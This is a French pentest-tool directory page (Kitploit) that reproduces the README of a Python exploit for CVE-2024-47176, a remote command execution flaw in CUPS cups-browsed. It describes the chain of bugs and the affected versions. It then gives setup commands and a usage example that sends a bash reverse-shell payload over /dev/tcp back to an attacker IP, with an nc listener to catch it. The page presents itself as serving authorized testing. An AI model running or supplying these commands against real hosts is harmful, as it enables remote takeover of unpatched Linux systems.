Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-47176 — Exploit Python pour CVE-2024-47176 permettant l'exécution de commandes à distance dans CUPS cups-browsed via des paquets UDP conçus. Inclut la livraison de charge utile de reverse shell pour des tests d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/gumerzzzindo/cve-2024-47176
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Exploit Python pour CVE-2024-47176 permettant l'exécution de commandes à distance dans CUPS cups-browsed via des paquets UDP conçus. Inclut la livraison de charge utile de reverse shell pour des tests d'intrusion autorisés.

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-47176 — Exécution de commandes à distance dans CUPS

CVE CVSS Python Platform License

Uniquement à des fins éducatives et de tests de pénétration autorisés.


Table des matières

  • Description
  • Systèmes affectés
  • CVE associées
  • Prérequis
  • Configuration
  • Utilisation
  • Avertissement

Description

(Common UNIX Printing System) est un système d'impression open-source qui gère les imprimantes réseau. CVE-2024-47176 cible le démon , qui écoute sur et fait aveuglément confiance aux paquets provenant de n'importe quelle source.

CUPS
cups-browsed
INADDR_ANY:631

En forgeant un paquet UDP malveillant qui déclenche une requête IPP Get-Printer-Attributes, un attaquant peut forcer cups-browsed à se connecter à un serveur contrôlé par l'attaquant — et en combinant cela avec les vulnérabilités ci-dessous, atteindre l'exécution arbitraire de commandes à distance.


Systèmes affectés

ComposantCondition
cups-browsedÉcoute sur UDP 631 (par défaut)
CUPS < 2.4.11Versions non patchées
Systèmes Linux avec CUPS exposéPort 631 accessible depuis l'attaquant

CVE associées

CVEDescription
CVE-2024-47176cups-browsed fait confiance à tout paquet UDP sur le port 631
CVE-2024-47076libcupsfilters ne nettoie pas les attributs IPP
CVE-2024-47175libppd injecte des données non nettoyées dans les fichiers PPD
CVE-2024-47177cups-filters permet l'exécution de commandes via PPD

Prérequis

  • Machine cible avec le port 631 (IPP/UDP) exposé
  • Python 3.x sur votre machine d'attaque
  • nmap (optionnel, pour la reconnaissance)
  • Un listener netcat pour le shell inverse

Configuration

1. Clonez le dépôt :

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Installez la dépendance Python requise :

root@kitploit:~
pip install ippserver

3. Lancez un listener sur votre machine :

root@kitploit:~
nc -lvnp <PORT>

Utilisation

root@kitploit:~
./evilcups.py <IP_ATTAQUANT> <IP_CIBLE> "<COMMANDE>"

Exemple — shell inverse :

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

Après avoir exécuté l'exploit, déclenchez un travail d'impression sur la cible (ou attendez une vérification automatique) pour exécuter la charge utile.


Avertissement

Ce dépôt est destiné uniquement à des fins éducatives et à la recherche en sécurité autorisée. Utiliser cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite est illégal et contraire à l'éthique.

Télécharger l’outil